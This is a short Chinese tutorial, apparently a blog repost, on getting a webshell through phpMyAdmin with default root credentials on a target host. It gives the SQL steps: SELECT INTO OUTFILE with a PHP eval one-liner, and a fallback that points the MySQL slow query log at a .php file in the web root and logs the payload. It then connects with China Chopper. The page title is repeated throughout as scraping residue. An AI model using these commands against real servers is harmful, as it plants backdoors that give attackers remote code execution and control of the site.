目标ip:192.168.52.143

一、御剑扫描该地址
42、利用sql语句写入shell
获取到重要信息:

1、网站的绝对路径
42、利用sql语句写入shell
2、phpmyadmin,并且是默认账号密码:root
42、利用sql语句写入shell
二、登录数据口后台,写入一句话木马

select ‘<?php eval($_POST[x]);?>’ into outfile ‘c:/phpstudy/www/xx.php’

执行的时候报错
42、利用sql语句写入shell

解决方法:

1、设置slow_query_log=1 启用慢查询日志。
42、利用sql语句写入shell

2、修改slow_query_log_file日志文件的绝对路径以及文件名
set global slow_query_log_file=‘c:/phpstudy/www/xx.php’
42、利用sql语句写入shell

3、向日志文件写入一句话
select ‘<?php eval($_POST[x]);?>’ or sleep(11)
42、利用sql语句写入shell
三、用菜刀链接
42、利用sql语句写入shell

禁止非法,后果自负
欢迎关注公众号:web安全工具库
42、利用sql语句写入shell

相关文章:

  • 2022-12-23
  • 2022-12-23
  • 2021-12-12
  • 2022-12-23
  • 2022-12-23
  • 2021-07-15
  • 2022-01-23
猜你喜欢
  • 2022-12-23
  • 2021-05-29
  • 2021-11-23
  • 2022-12-23
  • 2022-12-23
  • 2022-12-23
  • 2022-12-23
相关资源
相似解决方案